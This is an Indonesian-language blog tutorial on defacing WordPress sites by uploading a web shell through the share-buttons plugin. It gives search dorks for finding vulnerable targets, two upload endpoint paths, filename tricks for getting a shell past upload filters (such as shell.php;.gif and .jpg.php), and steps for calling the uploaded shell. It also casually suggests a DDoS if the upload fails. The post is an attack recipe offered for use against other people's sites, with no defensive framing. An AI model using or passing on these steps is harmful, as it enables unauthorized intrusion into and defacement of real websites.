Tutorial Deface Metode WordPress Share-Buttons Plugins Shell Upload.
Sabtu, 14 Maret 2020
Tambah Komentar
Yoyoyoyo wasap :V Hallo sobat razzer. Kali ini saya akan membagikan Turorial Deface Metode WordPress Share-Buttons Plugins Shell Upload.
Oke seperti biasa kita gasken aje:v
Bahan Bahan Yang Harus Kalian Perlukan :
- Hp/PC
- Internet
- Script Deface / Shell
Upload Ekstensi : .gif .jpg .png
Bypass Shell.php;.gif -> .asp;.png -> .shtml.fla;.jpeg
Dork :
inurl:''/wp-content/plugins/share-buttons/''
intext:''Sleeker More "Web 2.0" onChange Use''
Exploit :
1.) /wp-content/plugins/share-buttons/upload/index.php
2.) /wp-content/plugins/share-buttons/upload/scripts/ajaxupload.php
Step By Step :
1. Kalian dorking dulu seperti biasa:v
2. Pilih target kalian lalu tambahkan exploit nya bebas mau make yg ke 1 ke 2 kalo ke 1 gagal ya pake yg ke 2 kalo 2 2 nya gagal? ddos aja web nya wkwk:v
Contoh : http://razzerhacker.com/wp-content/plugins/share-buttons/upload/index.php
3. Nanti tampilan nya seperti di bawah ya teman teman.
namashell.jpg.php
namashell.Phtml
5. Nah setelah kalian upload lalu kita panggil sc/shell/jpg . dengan cara tambahkan wp-content/plugins/share-buttons/upload/uploads/namafilekalian.php
Contoh : http://razzerhacker.com/wp-content/plugins/share-buttons/upload/uploads/namafilekalian.php
